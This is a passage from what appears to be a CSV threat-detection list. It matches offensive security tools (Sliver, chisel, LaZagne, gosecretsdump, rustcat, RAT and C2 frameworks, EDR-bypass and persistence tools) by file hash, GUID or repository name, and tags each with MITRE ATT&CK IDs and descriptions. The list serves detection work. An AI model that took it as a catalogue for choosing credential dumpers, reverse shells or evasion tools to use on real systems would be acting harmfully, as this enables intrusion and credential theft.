for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*b236ff16fc6a017c5a84d0cc7969e0513636f37058b2b74a95d632ea26953586*",".{0,1000}b236ff16fc6a017c5a84d0cc7969e0513636f37058b2b74a95d632ea26953586.{0,1000}","offensive_tool_keyword","WMIPersistence","An example of how to perform WMI Event Subscription persistence using C#","T1547.008 - T1084 - T1053 - T1059.003","TA0003 - TA0004 - TA0002","N/A","N/A","Persistence","https://github.com/mdsecactivebreach/WMIPersistence","1","0","N/A","N/A","2","112","29","2019-05-29T09:48:46Z","2019-05-29T09:40:01Z" "*b23b05a5d904b794e12894c657e7a413a607f9c45bf78d59760cb4c0c21a7241*",".{0,1000}b23b05a5d904b794e12894c657e7a413a607f9c45bf78d59760cb4c0c21a7241.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*b23r0/Heroinn*",".{0,1000}b23r0\/Heroinn.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1059 - T1547 - T1068 - T1562 - T1110 - T1083 - T1021 - T1071","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*b23r0/Heroinn*",".{0,1000}b23r0\/Heroinn.{0,1000}","offensive_tool_keyword","Heroinn","A cross platform C2/post-exploitation framework implementation by Rust.","T1027 - T1033 - T1055 - T1071 - T1082 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/b23r0/Heroinn","1","1","N/A","10","10","617","209","2022-10-08T07:27:38Z","2015-05-16T14:54:19Z" "*b23r0/rsocx*",".{0,1000}b23r0\/rsocx.{0,1000}","offensive_tool_keyword","rsocx","A bind/reverse Socks5 proxy server.","T1090.001 - T1090.002 - T1071.001","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/b23r0/rsocx","1","1","N/A","10","10","354","139","2022-09-28T08:11:34Z","2015-05-13T04:02:55Z" "*b2588fa22ae0bd9b55a88a5b10f81a5fc684c455b6a285417050aaa8dbb2406b*",".{0,1000}b2588fa22ae0bd9b55a88a5b10f81a5fc684c455b6a285417050aaa8dbb2406b.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b25a37095a044369ef13a326fa144ddd84f08a980880dbb5c704b927a7343f4d*",".{0,1000}b25a37095a044369ef13a326fa144ddd84f08a980880dbb5c704b927a7343f4d.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b26458a0b60f4af597433fb7eff7b949ca96e59330f4e4bb85005e8bbcfa4f59*",".{0,1000}b26458a0b60f4af597433fb7eff7b949ca96e59330f4e4bb85005e8bbcfa4f59.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*b28abc2701ee133be62eaec40bfb4afc7c3bd862e94aac529b6ea687c0442bbd*",".{0,1000}b28abc2701ee133be62eaec40bfb4afc7c3bd862e94aac529b6ea687c0442bbd.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*B2924789-9912-4B6F-8F7B-53240AC3BA0E*",".{0,1000}B2924789\-9912\-4B6F\-8F7B\-53240AC3BA0E.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","0","N/A","10","10","1626","323","2024-01-21T06:45:07Z","2019-03-25T19:47:39Z" 
"*b2929f86fa6ae92dbbe1efe6e8523ed214beea67b52e6384ee22116689c0098e*",".{0,1000}b2929f86fa6ae92dbbe1efe6e8523ed214beea67b52e6384ee22116689c0098e.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*b2xtranslator.xls.csproj*",".{0,1000}b2xtranslator\.xls\.csproj.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","1","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "*b32776836ec9757de71ab8306f38ba4b2d3e556c5bf7036221c2153619c4dafc*",".{0,1000}b32776836ec9757de71ab8306f38ba4b2d3e556c5bf7036221c2153619c4dafc.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*B374K*index.php*",".{0,1000}B374K.{0,1000}index\.php.{0,1000}","offensive_tool_keyword","b374k","This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel. connecting using ssh. ftp etc. 
All actions take place within a web browser","T1021 - T1028 - T1071 - T1105 - T1135","TA0002 - TA0003 - TA0005","N/A","N/A","Web Attacks","https://github.com/b374k/b374k","1","0","N/A","N/A","10","2329","742","2023-07-06T20:23:03Z","2014-01-09T04:43:32Z" "*b37eeeceb6addc2243bca9c408ee13554726772d*",".{0,1000}b37eeeceb6addc2243bca9c408ee13554726772d.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*b38dd36a7b348f6350623b1156c9f8805f323dbb9d1dad4b599b6712b8962e82*",".{0,1000}b38dd36a7b348f6350623b1156c9f8805f323dbb9d1dad4b599b6712b8962e82.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*b3917dd81417aa8ed07f4a60b34853ea6fae2710a3b5812da455328e38b9e7e6*",".{0,1000}b3917dd81417aa8ed07f4a60b34853ea6fae2710a3b5812da455328e38b9e7e6.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b3a068eaaaefa3f21836c4628ad89fcf8cb20cdb22bc7a188e0b9be9aa29a9c3*",".{0,1000}b3a068eaaaefa3f21836c4628ad89fcf8cb20cdb22bc7a188e0b9be9aa29a9c3.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b3b092ecd0cdb03ec5c038d281b5acc2dec8f01ea55b5742f81410f4f54ff9e2*",".{0,1000}b3b092ecd0cdb03ec5c038d281b5acc2dec8f01ea55b5742f81410f4f54ff9e2.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b3ba329c974ac0a0ba97b9b63c91f562e80324c8c95ca22d7f004391f51aa51d*",".{0,1000}b3ba329c974ac0a0ba97b9b63c91f562e80324c8c95ca22d7f004391f51aa51d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*b3c2a6fe40c1c3688b2ea12b7211a3573f1fcfb0fc092e20826db40f8a2fba63*",".{0,1000}b3c2a6fe40c1c3688b2ea12b7211a3573f1fcfb0fc092e20826db40f8a2fba63.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). 
This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*b3f9b4b2534e4e7cf71b72d5f37b0745e0f6eda8ecc81c1e4139319f4cd56b34*",".{0,1000}b3f9b4b2534e4e7cf71b72d5f37b0745e0f6eda8ecc81c1e4139319f4cd56b34.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline separated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*b3rito*yodo*",".{0,1000}b3rito.{0,1000}yodo.{0,1000}","offensive_tool_keyword","yodo","This tool proves how easy it is to become root via limited sudo permissions. via dirty COW or using Pa(th)zuzu. 
","T1068 - T1078 - T1529","TA0004 - TA0008","N/A","N/A","Exploitation tools","https://github.com/b3rito/yodo","1","1","N/A","N/A","3","202","34","2017-02-28T15:38:13Z","2016-11-13T21:02:03Z" "*b4153afec8b3aa55877961a3cd2bb34defdd8cfb9524620cb640750d08e304ea*",".{0,1000}b4153afec8b3aa55877961a3cd2bb34defdd8cfb9524620cb640750d08e304ea.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b4278888f8ba29f27b4a289ee4aa382bd7b3e0ea8ffd0c8fd4038ad963d21113*",".{0,1000}b4278888f8ba29f27b4a289ee4aa382bd7b3e0ea8ffd0c8fd4038ad963d21113.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b44f8cfa584427bc18a8712218a1ce31b78b706cbfb02b0248b11f40b097ba9a*",".{0,1000}b44f8cfa584427bc18a8712218a1ce31b78b706cbfb02b0248b11f40b097ba9a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b4726b5d0aa21ed0f06326fcf2f9bd0c6171c76b610287a357710174f06dea52*",".{0,1000}b4726b5d0aa21ed0f06326fcf2f9bd0c6171c76b610287a357710174f06dea52.{0,1000}","offensive_tool_keyword","SharpRDP","Remote Desktop Protocol .NET Console Application for Authenticated Command Execution","T1021.001 - T1059.001 - T1059.003","TA0008 - TA0002","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpRDP","1","0","file_hash","10","10","958","453","2022-11-13T05:29:33Z","2020-01-21T08:31:50Z" "*B473B9A4135DE247C6D76510B40F63F8F1E5A2AB*",".{0,1000}B473B9A4135DE247C6D76510B40F63F8F1E5A2AB.{0,1000}","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","650","57","2024-04-22T10:43:11Z","2021-06-04T17:03:47Z" "*b47e50a181795a89f5972e7a4c06bf93a81cb8b15fc173ffcb526bac16f71f09*",".{0,1000}b47e50a181795a89f5972e7a4c06bf93a81cb8b15fc173ffcb526bac16f71f09.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" 
"*b4a1ab9bd2528e57f4a018ac84934c6bdcd67aaaf269f76c15fa739432409f3b*",".{0,1000}b4a1ab9bd2528e57f4a018ac84934c6bdcd67aaaf269f76c15fa739432409f3b.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*b4a7045568cb78f48f42b93f528e14ef24f8dc3bf878af0b94ca22c5df546da5*",".{0,1000}b4a7045568cb78f48f42b93f528e14ef24f8dc3bf878af0b94ca22c5df546da5.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","10","2","133","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z" "*b4bdf8ba2bfa4fdb140059b502dc0d7a84efe934cf1a251c23d89954aff38896*",".{0,1000}b4bdf8ba2bfa4fdb140059b502dc0d7a84efe934cf1a251c23d89954aff38896.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b4e643fed3f93eaeb38e615b97041ca7317df9c6e177da9e77e718bb559004bd*",".{0,1000}b4e643fed3f93eaeb38e615b97041ca7317df9c6e177da9e77e718bb559004bd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b4fb64cc1619a9c41a8493ddc6496d3825cbacfa02eb445e4c6371a46a5b84f0*",".{0,1000}b4fb64cc1619a9c41a8493ddc6496d3825cbacfa02eb445e4c6371a46a5b84f0.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","N/A","7","2","146","24","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z" "*b4rtik/RedPeanut*",".{0,1000}b4rtik\/RedPeanut.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*b4rtik/RedPeanut*",".{0,1000}b4rtik\/RedPeanut.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1095 - T1071.004","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*b501b1a7f5d1ca09fa28d4c2d9e839a5d7e8a9f336d3698c947cac13b02a599a*",".{0,1000}b501b1a7f5d1ca09fa28d4c2d9e839a5d7e8a9f336d3698c947cac13b02a599a.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*B5205EBA-EC32-4C53-86A0-FAEEE7393EC0*",".{0,1000}B5205EBA\-EC32\-4C53\-86A0\-FAEEE7393EC0.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*b53fab9c9dfd6eabe8c543a8484f216dba733b3831b4c440cef8064407c343fb*",".{0,1000}b53fab9c9dfd6eabe8c543a8484f216dba733b3831b4c440cef8064407c343fb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over 
HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*b54b60bac7b606297627c36b551aa0dfb1291a73175e98da76014e36839049cd*",".{0,1000}b54b60bac7b606297627c36b551aa0dfb1291a73175e98da76014e36839049cd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b55dd8b809ebb71681cb09b07d6def2ea453d36d25c2a74a4ecac7662c3ddbbd*",".{0,1000}b55dd8b809ebb71681cb09b07d6def2ea453d36d25c2a74a4ecac7662c3ddbbd.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*B5627919-4DFB-49C6-AC1B-C757F4B4A103*",".{0,1000}B5627919\-4DFB\-49C6\-AC1B\-C757F4B4A103.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*B5A3FA5B3DA95F6AA7556EE2BC62E5D290F72453105EF88E170174994DDA2650*",".{0,1000}B5A3FA5B3DA95F6AA7556EE2BC62E5D290F72453105EF88E170174994DDA2650.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system 
access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","AD Enumeration","7","10","906","155","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" "*b5d812b7f5a4a7a3dcb7a2406ce0e9ea3d247179acdf3e2f69124786bc3205c8*",".{0,1000}b5d812b7f5a4a7a3dcb7a2406ce0e9ea3d247179acdf3e2f69124786bc3205c8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*b5e23007cc2853e15b55346a3e3088eabdeeab5e61834efe7852b04f0d201455*",".{0,1000}b5e23007cc2853e15b55346a3e3088eabdeeab5e61834efe7852b04f0d201455.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*B5E39D15-9678-474A-9838-4C720243968B*",".{0,1000}B5E39D15\-9678\-474A\-9838\-4C720243968B.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","10","10","525","123","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z" 
"*b61337b16cd16d660ebb308bf91466929d6d85710b595d733c8d11aa7840ec9e*",".{0,1000}b61337b16cd16d660ebb308bf91466929d6d85710b595d733c8d11aa7840ec9e.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*b626f6ca0ff3ed66408fdfe3e31466797b020447209cef538ccecd59b068a504*",".{0,1000}b626f6ca0ff3ed66408fdfe3e31466797b020447209cef538ccecd59b068a504.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" 